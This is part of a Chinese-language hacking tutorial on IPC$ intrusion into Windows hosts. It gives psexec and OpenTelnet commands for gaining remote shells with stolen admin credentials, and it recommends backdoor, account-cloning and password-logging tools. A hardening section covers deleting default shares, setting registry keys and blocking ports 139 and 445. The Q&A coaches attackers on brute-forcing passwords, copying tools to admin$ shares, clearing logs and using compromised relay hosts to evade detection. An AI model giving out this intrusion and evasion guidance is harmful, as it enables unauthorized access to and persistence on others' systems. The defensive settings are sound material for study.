IPC$命令详解(二)

好了，写到这里我似乎回到了2，3年前，那时的ipc$大家都是这么用的，不过随着新工具的出现，上面提到的一些工具和命令现在已经不常用到了，那就让我们看看现在的高效而简单的ipc$入侵吧。

[1]
psexec.exe \\IP -u 管理员账号 -p 密码 cmd
\\用这个工具我们可以一步到位的获得shell
OpenTelnet.exe \\server 管理员账号 密码 NTLM的认证方式 port
\\用它可以方便的更改telnet的验证方式和端口，方便我们登陆
[2]
已经没有第二步了，用一步获得shell之后，你做什么都可以了，安后门可以用winshell，克隆就用ca吧，开终端用3389.vbe，记录密码用win2kpass，总之好的工具不少，随你选了，我就不多说了。
十四 如何防范ipc$入侵察看本地共享资源
运行-cmd-输入net share
删除共享(每次输入一个）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以继续删除）
1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)
运行regedit，找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为：1
如果设置为"1"，一个匿名用户仍然可以连接到IPC$共享，但无法通过这种连接得到列举SAM账号和共享信息的权限；在Windows 2000 中增加了"2"，未取得匿名权的用户将不能进行ipc$空连接。建议设置为1。如果上面所说的主键不存在，就新建一个再改键值。如果你觉得改注册表麻烦，可以在本地安全设置中设置此项： 在本地安全设置－本地策略－安全选项－'对匿名连接的额外限制'
2 禁止默认共享
1）察看本地共享资源
运行-cmd-输入net share
2）删除共享（重起后默认共享仍然存在）
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete（如果有e,f,……可以继续删除）
3）停止server服务
net stop server /y （重新启动后server服务会重新开启）
4）禁止自动打开默认共享（此操作并不能关闭ipc$共享）
运行-regedit
server版:找到如下主键
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer（DWORD）的键值改为:00000000。
pro版:找到如下主键
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks（DWORD）的键值改为:00000000。
这两个键值在默认情况下在主机上是不存在的，需要自己手动添加，修改后重起机器使设置生效。
3 关闭ipc$和默认共享依赖的服务:server服务
如果你真的想关闭ipc$共享，那就禁止server服务吧：
控制面板-管理工具-服务-找到server服务（右击）-属性-常规-启动类型-选已禁用，这时可能会有提示说：XXX服务也会关闭是否继续，因为还有些次要的服务要依赖于server服务，不要管它。
4 屏蔽139，445端口
由于没有以上两个端口的支持，是无法建立ipc$的，因此屏蔽139，445端口同样可以阻止ipc$入侵。
1）139端口可以通过禁止NBT来屏蔽
本地连接－TCP/IT属性－高级－WINS－选‘禁用TCP/IT上的NETBIOS’一项
2）445端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
修改完后重启机器
注意：如果屏蔽掉了以上两个端口，你将无法用ipc$入侵别人。
3）安装防火墙进行端口过滤
6 设置复杂密码，防止通过ipc$穷举出密码，我觉得这才是最好的办法，增强安全意识，比不停的打补丁要安全的多。
十五 ipc$入侵问答精选
1.进行ipc$入侵的时候，会在服务器中留下记录，有什么办法可以不让服务器发现吗？
答：留下记录是一定的，你走后用清除日志程序删除就可以了，或者用肉鸡入侵。
2.你看下面的情况是为什么，可以连接但不能复制
net use \\***.***.***.***\ipc$ "密码" /user:"用户名"
命令成功
copy icmd.exe \\***.***.***.***\admin$
找不到网络路径
命令不成功
答：像“找不到网络路径”“找不到网络名”之类的问题，大多是因为你想要复制到的共享文件夹没有开启，所以在复制的时候会出现错误，你可以试着找找其他的共享文件夹。
3.如果对方开了IPC$，且能建立空联接，但打开C、D盘时，都要求密码，我知道是空连接没有太多的权限，但没别的办法了吗？
答：建议先用流光或者别的什么扫描软件试着猜解一下密码，如果猜不出来，只能放弃，毕竟空连接的能力有限。
4.我已经猜解到了管理员的密码，且已经ipc$连接成功了，但net view \\ip发现它没开默认共享，我该怎么办？
答：首先纠正你的一个错误，用net view \\ip是无法看到默认共享的，你可以试着将文件复制到c$，d$看看，如果都不行，说明他关闭了默认共享，那你就用opentelnet.exe或psexec.exe吧，用法上面有。
5.ipc$连接成功后，我用下面的命令建立了一个帐户，却发现这个帐户在我自己的机器上，这是怎么回事？
net uset ccbirds /add
答：ipc$建立成功只能说明你与远程主机建立了通信隧道，并不意味你取得了一个shell，只有在获得一个shell（比如telnet）之后，你才能在远程机器建立一个帐户，否则你的操作只是在本地进行。
6.我已进入了一台肉机，用的管理员账号，可以看他的系统时间，但是复制程序到他的机子上却不行，每次都提示“拒绝访问，已复制0个文件”，是不是对方有什么服务没开，我该怎么办？
答：一般来说“拒绝访问”都是权限不够的结果，可能是你用的帐户有问题，还有一种可能，如果你想向普通共享文件夹复制文件却返回这个错误，说明这个文件夹设置的允许访问用户中不包括你（哪怕你是管理员），这一点我在上一期文章中分析了。
7.我用Win98能与对方建立ipc$连接吗？
答：理论上不可以，要进行ipc$的操作，建议用win2000，用其他操作系统会带来许多不必要的麻烦。
8.我用net use \\ip\ipc$ "" /user ""成功的建立了一个空会话，但用nbtstat -A IP 却无法导出用户列表，这是为什么？
答：空会话在默认的情况下是可以导出用户列表的，但如果管理员通过修改注册表来禁止导出列表，就会出现你所说的情况；还有可能是你自己的NBT没有打开，netstat命令是建立在NBT之上的。
9.我建立ipc$连接的时候返回如下信息：‘提供的凭据与已存在的凭据集冲突’，怎么回事？
答：呵呵，这说明你已经与目标主机建立了ipc$连接，两个主机间同时建立两个ipc$连接是不允许的。
10.我在映射的时候出现：
F:\>net use h: \\211.161.134.*\e$
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事？
答：你也太粗心了吧，这说明你有一个h盘了，映射到没有的盘符吧！
11.我建立了一个连接f:\>net use \\*.*.*.*\ipc$ "123" /user:"guest" 成功了，但当我映射时出现了错误，向我要密码，怎么回事？
F:\>net use h: \\*.*.*.*\c$
密码在 \\*.*.*.*\c$ 无效。
请键入 \\*.*.*.*\c$ 的密码:
系统发生 5 错误。
拒绝访问。
答：呵呵，向你要密码说明你当前使用的用户权限不够，不能映射C$这个默认共享，想办法提升权限或者找管理员的弱口令吧！默认共享一般是需要管理员权限的。
12.我用superscan扫到了一个开了139端口的主机，但为什么不能空连接呢？
答：你混淆了ipc$与139的关系，能进行ipc$连接的主机一定开了139或445端口，但开这两个端口的主机可不一定能空连接，因为对方可以关闭ipc$共享.
13.我门局域网里的机器大多都是xp，我用流光扫描到几个administrator账号口令是空，而且可以连接，但不能复制东西，说错误5。请问为什么？
答：xp的安全性要高一些，在安全策略的默认设置中，对本地帐户的网络登录进行身份验证的时候，默认为来宾权限，即使你用管理员远程登录，也只具有来宾权限，因此你复制文件，当然是错误5：权限不够。
14.我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功，可是 net use i: \\192.168.0.2\c
出现请键入 \\192.168.0.2 的密码，怎么回事情呢？我用的可是管理员呀？应该什么都可以访问呀？
答：虽然你具有管理员权限，但管理员在设置c盘共享权限时（注意：普通共享可以设置访问权限，而默认共享则不能）可能并未设置允许administrator访问，所以会出现上述问题。
15.如果自己的机器禁止了ipc$, 是不是还可以用ipc$连接别的机器？如果禁止server服务呢？
答：禁止以上两项仍可以发起ipc$连接，不过这种问题自己动手试验会更好。
16.能告诉我下面的两个错误产生的原因吗？
c:\>net time \\61.225.*.*
系统发生 5 错误。
拒绝访问。
c:\>net view \\61.225.*.*
系统发生 5 错误。
拒绝访问。
答：起初遇到这个问题的时候我也很纳闷，错误5表示权限不够，可是连空会话的权限都可以完成上面的两个命
令，他为什么不行呢？难道是他没建立连接？后来那个粗心的同志告诉我的确是这样，他忘记了自己已经删了
ipc$连接，之后他又输入了上面那两个命令，随之发生了错误5。
17.您看看这是怎么回事？
F:\>net time
找不到时间服务器。
请键入 NET HELPMSG 3912 以获得更多的帮助。
答：答案很简单，你的命令错了，应该是net time \\ip
没输入ip地址，当然找不到服务器。view的命令也应该有ip地址，即：net view \\ip